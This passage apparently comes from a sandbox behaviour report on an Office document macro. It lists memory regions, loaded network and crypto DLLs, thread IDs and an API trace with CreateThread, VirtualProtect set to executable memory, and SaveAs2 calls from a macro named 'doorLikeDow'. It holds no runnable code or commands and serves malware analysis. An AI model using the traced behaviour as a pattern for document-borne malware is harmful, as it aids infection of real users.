0x116e0000 end_va = 0x11adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000116e0000" filename = "" Region: id = 660 start_va = 0x11ae0000 end_va = 0x11aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ae0000" filename = "" Region: id = 661 start_va = 0x11af0000 end_va = 0x11afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011af0000" filename = "" Region: id = 662 start_va = 0x11b00000 end_va = 0x11b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b00000" filename = "" Region: id = 663 start_va = 0x11b10000 end_va = 0x11b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b10000" filename = "" Region: id = 664 start_va = 0x11b20000 end_va = 0x11b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b20000" filename = "" Region: id = 665 start_va = 0x11b30000 end_va = 0x11b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b30000" filename = "" Region: id = 666 start_va = 0x11b40000 end_va = 0x11b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b40000" filename = "" Region: id = 667 start_va = 0x11b50000 end_va = 0x11b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b50000" filename = "" Region: id = 668 start_va = 0x11b10000 end_va = 0x11babfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b10000" filename = "" Region: id = 669 start_va = 0x11bb0000 end_va = 0x11bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bb0000" filename = "" Region: id = 670 start_va = 0x11bc0000 end_va = 0x11bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bc0000" filename = "" Region: id = 671 start_va = 0x11bd0000 end_va = 0x11bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bd0000" filename = "" Region: id = 672 start_va = 0x11be0000 end_va = 0x11beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011be0000" filename = "" Region: id = 673 start_va = 0x11bf0000 end_va = 0x11bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bf0000" filename = "" Region: id = 674 start_va = 0x11bb0000 end_va = 0x11bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bb0000" filename = "" Region: id = 675 start_va = 0x11bc0000 end_va = 0x11bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bc0000" filename = "" Region: id = 676 start_va = 0x11bd0000 end_va = 0x11bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bd0000" filename = "" Region: id = 677 start_va = 0x11be0000 end_va = 0x11beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011be0000" filename = "" Region: id = 678 start_va = 0x11bf0000 end_va = 0x11bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bf0000" filename = "" Region: id = 679 start_va = 0x11c00000 end_va = 0x11c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c00000" filename = "" Region: id = 680 start_va = 0x11c10000 end_va = 0x11c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c10000" filename = "" Region: id = 681 start_va = 0x11c10000 end_va = 0x11c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c10000" filename = "" Region: id = 682 start_va = 0x11c20000 end_va = 0x11c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c20000" filename = "" Region: id = 683 start_va = 0x11c30000 end_va = 0x11c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c30000" filename = "" Region: id = 684 start_va = 0x11c40000 end_va = 0x11c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c40000" filename = "" Region: id = 685 start_va = 0x11c50000 end_va = 0x11c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c50000" filename = "" Region: id = 686 start_va = 0x11c60000 end_va = 0x11c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c60000" filename = "" Region: id = 687 start_va = 0x11c70000 end_va = 0x11c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c70000" filename = "" Region: id = 688 start_va = 0x11c80000 end_va = 0x11c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c80000" filename = "" Region: id = 689 start_va = 0x11c90000 end_va = 0x11c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c90000" filename = "" Region: id = 690 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 691 start_va = 0x11c10000 end_va = 0x11c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c10000" filename = "" Region: id = 692 start_va = 0x11c10000 end_va = 0x12bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011c10000" filename = "" Region: id = 699 start_va = 0x12be0000 end_va = 0x12be0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012be0000" filename = "" Region: id = 701 start_va = 0x12bf0000 end_va = 0x12bfefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012bf0000" filename = "" Region: id = 703 start_va = 0x12c00000 end_va = 0x12c0efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c00000" filename = "" Region: id = 704 start_va = 0x12c10000 end_va = 0x12c12fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c10000" filename = "" Region: id = 705 start_va = 0x12c20000 end_va = 0x12c20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c20000" filename = "" Region: id = 714 start_va = 0x12c10000 end_va = 0x12c10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c10000" filename = "" Region: id = 715 start_va = 0x12c30000 end_va = 0x12c32fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c30000" filename = "" Region: id = 716 start_va = 0x12c40000 end_va = 0x12c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c40000" filename = "" Region: id = 717 start_va = 0x12c50000 end_va = 0x12c51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c50000" filename = "" Region: id = 718 start_va = 0x12c60000 end_va = 0x12c60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c60000" filename = "" Region: id = 719 start_va = 0x12c70000 end_va = 0x12c71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c70000" filename = "" Region: id = 720 start_va = 0x12c80000 end_va = 0x12c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c80000" filename = "" Region: id = 721 start_va = 0x12c90000 end_va = 0x12c92fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c90000" filename = "" Region: id = 724 start_va = 0x12ca0000 end_va = 0x12caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012ca0000" filename = "" Region: id = 727 start_va = 0x12cb0000 end_va = 0x12cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012cb0000" filename = "" Region: id = 728 start_va = 0x12cc0000 end_va = 0x12ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012cc0000" filename = "" Region: id = 730 start_va = 0x12bf0000 end_va = 0x12bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012bf0000" filename = "" Region: id = 781 start_va = 0x12c10000 end_va = 0x12c1cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c10000" filename = "" Region: id = 782 start_va = 0x12c30000 end_va = 0x12c3cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012c30000" filename = "" Region: id = 783 start_va = 0x12cb0000 end_va = 0x12daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012cb0000" filename = "" Region: id = 784 start_va = 0x657b0000 end_va = 0x657eafff monitored = 0 entry_point = 0x657c56aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msproof7.dll") Region: id = 786 start_va = 0x96a0000 end_va = 0x96a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 788 start_va = 0x64080000 end_va = 0x649cafff monitored = 0 entry_point = 0x640fec58 region_type = mapped_file name = "igx.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\IGX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\igx.dll") Region: id = 789 start_va = 0x96a0000 end_va = 0x96a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000096a0000" filename = "" Region: id = 790 start_va = 0x96b0000 end_va = 0x96b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096b0000" filename = "" Region: id = 791 start_va = 0x96c0000 end_va = 0x96c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096c0000" filename = "" Region: id = 792 start_va = 0x96d0000 end_va = 0x96d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096d0000" filename = "" Region: id = 1076 start_va = 0x65c90000 end_va = 0x65cf3fff monitored = 0 entry_point = 0x65c968c8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\proof\\1033\\msgr8en.dll") Region: id = 1118 start_va = 0x700d0000 end_va = 0x7016afff monitored = 0 entry_point = 0x7010f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1119 start_va = 0x71970000 end_va = 0x7199efff monitored = 0 entry_point = 0x7197bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1120 start_va = 0x74610000 end_va = 0x74616fff monitored = 0 entry_point = 0x74611e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1121 start_va = 0x718f0000 end_va = 0x71902fff monitored = 0 entry_point = 0x718f25d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1122 start_va = 0x718d0000 end_va = 0x718e3fff monitored = 0 entry_point = 0x718d3c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1123 start_va = 0x70170000 end_va = 0x70181fff monitored = 0 entry_point = 0x70174510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1124 start_va = 0x701a0000 end_va = 0x703acfff monitored = 0 entry_point = 0x7028acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1125 start_va = 0x96b0000 end_va = 0x96b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1126 start_va = 0x71a70000 end_va = 0x71abefff monitored = 0 entry_point = 0x71a7d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1127 start_va = 0x700c0000 end_va = 0x700c7fff monitored = 0 entry_point = 0x700c1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1128 start_va = 0x719a0000 end_va = 0x71a23fff monitored = 0 entry_point = 0x719c6530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1129 start_va = 0x659f0000 end_va = 0x65a57fff monitored = 0 entry_point = 0x65a170a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 1130 start_va = 0x71960000 end_va = 0x71967fff monitored = 0 entry_point = 0x71961920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1131 start_va = 0x71910000 end_va = 0x71956fff monitored = 0 entry_point = 0x719258d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1132 start_va = 0x6fef0000 end_va = 0x6ff53fff monitored = 0 entry_point = 0x6ff0afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1133 start_va = 0x96c0000 end_va = 0x96c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096c0000" filename = "" Region: id = 1134 start_va = 0x6fee0000 end_va = 0x6feeffff monitored = 0 entry_point = 0x6fee4600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 1135 start_va = 0x6fec0000 end_va = 0x6fedffff monitored = 0 entry_point = 0x6fecd120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 1136 start_va = 0x6fe90000 end_va = 0x6febbfff monitored = 0 entry_point = 0x6feabb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 1137 start_va = 0x96e0000 end_va = 0x96e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096e0000" filename = "" Region: id = 1138 start_va = 0x96e0000 end_va = 0x971ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096e0000" filename = "" Region: id = 1139 start_va = 0x9720000 end_va = 0x981ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009720000" filename = "" Region: id = 1140 start_va = 0x6fe70000 end_va = 0x6fe89fff monitored = 0 entry_point = 0x6fe7fa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 1141 start_va = 0x658e0000 end_va = 0x659e9fff monitored = 0 entry_point = 0x65941e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 1142 start_va = 0x6fe60000 end_va = 0x6fe67fff monitored = 0 entry_point = 0x6fe61d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1143 start_va = 0x96c0000 end_va = 0x96c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096c0000" filename = "" Region: id = 1144 start_va = 0x9820000 end_va = 0x9820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009820000" filename = "" Region: id = 1160 start_va = 0x96c0000 end_va = 0x96c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096c0000" filename = "" Region: id = 1161 start_va = 0x9820000 end_va = 0x9820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009820000" filename = "" Thread: id = 1 os_tid = 0x13c8 Thread: id = 2 os_tid = 0xadc Thread: id = 3 os_tid = 0x1364 Thread: id = 4 os_tid = 0xc48 Thread: id = 5 os_tid = 0x1340 Thread: id = 6 os_tid = 0x818 Thread: id = 7 os_tid = 0x808 Thread: id = 8 os_tid = 0x34c Thread: id = 9 os_tid = 0xc18 Thread: id = 10 os_tid = 0x1300 Thread: id = 11 os_tid = 0x1348 Thread: id = 12 os_tid = 0x1344 Thread: id = 13 os_tid = 0x904 Thread: id = 14 os_tid = 0xbf0 Thread: id = 15 os_tid = 0x1c4 Thread: id = 16 os_tid = 0x1370 [0111.356] DispCallFunc (pvInstance=0xf1ce064, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x198170) returned 0x0 [0111.359] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x65fb11d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x198080 | out: lpThreadId=0x198080*=0x60) returned 0xd34 [0111.369] PeekMessageA (in: lpMsg=0x198060, hWnd=0x40200, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x198060) returned 0 [0111.396] NtdllDefWindowProc_A (hWnd=0x40200, Msg=0x1c, wParam=0x0, lParam=0xcf0) returned 0x0 [0111.429] GetActiveWindow () returned 0x0 [0111.429] CRetailMalloc_Alloc () returned 0xf1d0988 [0111.429] CRetailMalloc_Realloc () returned 0xb9534d0 [0111.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf0b2434, cbMultiByte=0, lpWideCharStr=0x1118007c, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0111.431] CRetailMalloc_Realloc () returned 0xf1fbdc0 [0111.431] CRetailMalloc_Realloc () returned 0xf19ba58 [0111.431] realloc (_Block=0x0, _Size=0x100) returned 0xd015450 [0111.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11022712, cbMultiByte=5, lpWideCharStr=0x197844, cchWideChar=6 | out: lpWideCharStr="main") returned 5 [0111.433] CRetailMalloc_Alloc () returned 0xb80ef98 [0111.433] CRetailMalloc_Alloc () returned 0xf0ba4a0 [0111.433] CRetailMalloc_Alloc () returned 0xf0ba740 [0111.433] CRetailMalloc_Alloc () returned 0xf1fb2f8 [0111.433] CRetailMalloc_Alloc () returned 0xf1fb520 [0111.433] CRetailMalloc_Alloc () returned 0xf1fbfe8 [0111.433] CRetailMalloc_Alloc () returned 0xf1d1198 [0111.433] CRetailMalloc_Realloc () returned 0xefd2ac0 [0111.433] _mbscpy_s (in: _Dst=0x19737c, _DstSizeInBytes=0xd, _Src=0x10ee2a12 | out: _Dst=0x19737c) returned 0x0 [0111.433] CRetailMalloc_Free () returned 0x1 [0111.433] CRetailMalloc_Realloc () returned 0xf102fd8 [0111.433] CRetailMalloc_Realloc () returned 0xb8863f0 [0111.434] CRetailMalloc_Alloc () returned 0xf102ff0 [0111.434] CRetailMalloc_Alloc () returned 0xf103068 [0111.434] CRetailMalloc_Alloc () returned 0xf1031b8 [0111.434] CRetailMalloc_Alloc () returned 0xf103230 [0111.434] CRetailMalloc_Alloc () returned 0xf052490 [0111.434] CRetailMalloc_Alloc () returned 0xf1fd7a0 [0111.434] CRetailMalloc_Alloc () returned 0xf103290 [0111.434] CRetailMalloc_Free () returned 0x1 [0111.435] CRetailMalloc_Realloc () returned 0xb81db50 [0111.435] CRetailMalloc_Realloc () returned 0xf18da50 [0111.435] CRetailMalloc_Realloc () returned 0xf109080 [0111.435] CRetailMalloc_Alloc () returned 0xf1dac38 [0111.436] CRetailMalloc_Realloc () returned 0xf1d0988 [0111.436] CRetailMalloc_Free () returned 0x1 [0111.436] GetCurrentProcess () returned 0xffffffff [0111.436] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa69c, dwSize=0x14) returned 1 [0111.436] VirtualProtect (in: lpAddress=0xf1fa69c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0111.437] GetCurrentProcess () returned 0xffffffff [0111.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa69d, dwSize=0x2) returned 1 [0111.437] GetCurrentProcess () returned 0xffffffff [0111.437] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6bc, dwSize=0x14) returned 1 [0111.437] VirtualProtect (in: lpAddress=0xf1fa6bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0111.438] GetCurrentProcess () returned 0xffffffff [0111.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6bd, dwSize=0x2) returned 1 [0111.439] GetCurrentProcess () returned 0xffffffff [0111.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6dc, dwSize=0x14) returned 1 [0111.439] VirtualProtect (in: lpAddress=0xf1fa6dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0111.439] GetCurrentProcess () returned 0xffffffff [0111.439] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fa6dd, dwSize=0x2) returned 1 [0111.440] free (_Block=0x0) [0111.440] free (_Block=0x0) [0111.440] free (_Block=0x0) [0111.440] CRetailMalloc_Alloc () returned 0xf109758 [0111.440] CRetailMalloc_Free () returned 0x1 [0111.440] CRetailMalloc_Alloc () returned 0xb8f5990 [0111.440] GetCurrentProcess () returned 0xffffffff [0111.440] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf1fb34a, dwSize=0xc) returned 1 [0111.440] VirtualProtect (in: lpAddress=0xf1fb34a, dwSize=0xc, flNewProtect=0x40, lpflOldProtect=0x197b14 | out: lpflOldProtect=0x197b14*=0x4) returned 1 [0111.441] free (_Block=0x0) [0111.441] free (_Block=0x0) [0111.441] free (_Block=0x0) [0111.441] GetAsyncKeyState (vKey=3) returned 0 [0111.442] CRetailMalloc_Realloc () returned 0xb84ef20 [0111.442] CRetailMalloc_Alloc () returned 0xf1d09e8 [0111.442] CRetailMalloc_Realloc () returned 0xb953650 [0111.443] CRetailMalloc_Realloc () returned 0xf0b2458 [0111.443] CRetailMalloc_Realloc () returned 0xf109878 [0111.443] realloc (_Block=0x0, _Size=0x100) returned 0xd015558 [0111.444] CRetailMalloc_Realloc () returned 0xf19c510 [0111.444] CRetailMalloc_Alloc () returned 0xb9c18e8 [0111.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2a3e, cbMultiByte=12, lpWideCharStr=0x1977e4, cchWideChar=13 | out: lpWideCharStr="doorLikeDow") returned 12 [0111.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2a3e, cbMultiByte=12, lpWideCharStr=0x1977e4, cchWideChar=13 | out: lpWideCharStr="doorLikeDow") returned 12 [0111.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2a3e, cbMultiByte=12, lpWideCharStr=0x1977e4, cchWideChar=13 | out: lpWideCharStr="doorLikeDow") returned 12 [0111.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2a3e, cbMultiByte=12, lpWideCharStr=0x1977e4, cchWideChar=13 | out: lpWideCharStr="doorLikeDow") returned 12 [0111.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2a3e, cbMultiByte=12, lpWideCharStr=0x1977e4, cchWideChar=13 | out: lpWideCharStr="doorLikeDow") returned 12 [0111.445] CRetailMalloc_Realloc () returned 0xefd8020 [0111.445] CRetailMalloc_Alloc () returned 0xb953510 [0111.445] _mbscpy_s (in: _Dst=0xb953510, _DstSizeInBytes=0xc, _Src=0x10ee2a3e | out: _Dst=0xb953510) returned 0x0 [0111.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2b02, cbMultiByte=19, lpWideCharStr=0x1977f4, cchWideChar=20 | out: lpWideCharStr="_B_var_doorLikeDow") returned 19 [0111.446] _mbscpy_s (in: _Dst=0x19785c, _DstSizeInBytes=0xc, _Src=0x10ee2a3e | out: _Dst=0x19785c) returned 0x0 [0111.446] CRetailMalloc_Free () returned 0x1 [0111.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee26ca, cbMultiByte=15, lpWideCharStr=0x1977e4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0111.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee26ca, cbMultiByte=15, lpWideCharStr=0x1977e4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0111.447] CRetailMalloc_Realloc () returned 0xf109800 [0111.447] CRetailMalloc_Realloc () returned 0xb8866f0 [0111.449] CRetailMalloc_Alloc () returned 0xb886480 [0111.449] CRetailMalloc_Realloc () returned 0xf12d028 [0111.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee26ca, cbMultiByte=15, lpWideCharStr=0x1977a4, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0111.450] CRetailMalloc_Realloc () returned 0xf0b30b8 [0111.451] CRetailMalloc_Realloc () returned 0xf1fc888 [0111.452] CRetailMalloc_Realloc () returned 0xb81d998 [0111.452] CRetailMalloc_Realloc () returned 0xf18cbe0 [0111.452] realloc (_Block=0x0, _Size=0x20) returned 0xd0138a8 [0111.452] realloc (_Block=0x0, _Size=0x60) returned 0xd015660 [0111.453] CRetailMalloc_Alloc () returned 0xb886510 [0111.453] CRetailMalloc_Realloc () returned 0xf1f92a8 [0111.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x10ee2a66, cbMultiByte=8, lpWideCharStr=0x1977bc, cchWideChar=9 | out: lpWideCharStr="SaveAs2") returned 8 [0111.453] CRetailMalloc_Realloc () returned 0xefd8a48 [0111.453] CRetailMalloc_Realloc () returned 0xf1f1808 [0111.454] CRetailMalloc_Alloc () returned 0xf102fd8 [0111.454] _mbscpy_s (in: _Dst=0xf102fd8, _DstSizeInBytes=0x9, _Src=0x10ee2a8a | out: _Dst=0xf102fd8) returned 0x0 [0111.454] SysStringByteLen (bstr="FileName") returned 0x10 [0111.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FileName", cchWideChar=8, lpMultiByteStr=0x1976e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileName\x04w\x19", lpUsedDefaultChar=0x0) returned 8 [0111.454] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FileName", cchCount1=-1, lpString2="FileName", cchCount2=-1) returned 2 [0111.454] CRetailMalloc_Free () returned 0x1 [0111.454] CRetailMalloc_Alloc () returned 0xf102fd8 [0111.455] _mbscpy_s (in: _Dst=0xf102fd8, _DstSizeInBytes=0xb, _Src=0x10ee2ab2 | out: _Dst=0xf102fd8) returned 0x0 [0111.455] SysStringByteLen (bstr="FileName") returned 0x10 [0111.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FileName", cchWideChar=8, lpMultiByteStr=0x1976e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileName\x04w\x19", lpUsedDefaultChar=0x0) returned 8 [0111.455] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FileName", cchCount1=-1, lpString2="FileFormat", cchCount2=-1) returned 3 [0111.455] SysStringByteLen (bstr="FileFormat") returned 0x14 [0111.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FileFormat", cchWideChar=10, lpMultiByteStr=0x1976e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FileFormat\x19", lpUsedDefaultChar=0x0) returned 10 [0111.527] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="FileFormat", cchCount1=-1, lpString2="FileFormat", cchCount2=-1) returned 2 [0111.528] CRetailMalloc_Free () returned 0x1 [0111.528] CRetailMalloc_Realloc () returned 0xf1d11f8 [0111.534] CRetailMalloc_Realloc () returned 0xf1d11f8 [0111.537] CRetailMalloc_Alloc () returned 0xf1d1b00 [0111.538] CRetailMalloc_Realloc () returned 0xf1fbb98 [0111.538] CRetailMalloc_Realloc () returned 0xf1d09e8 [0111.538] CRetailMalloc_Free () returned 0x1 [0111.538] GetCurrentProcess () 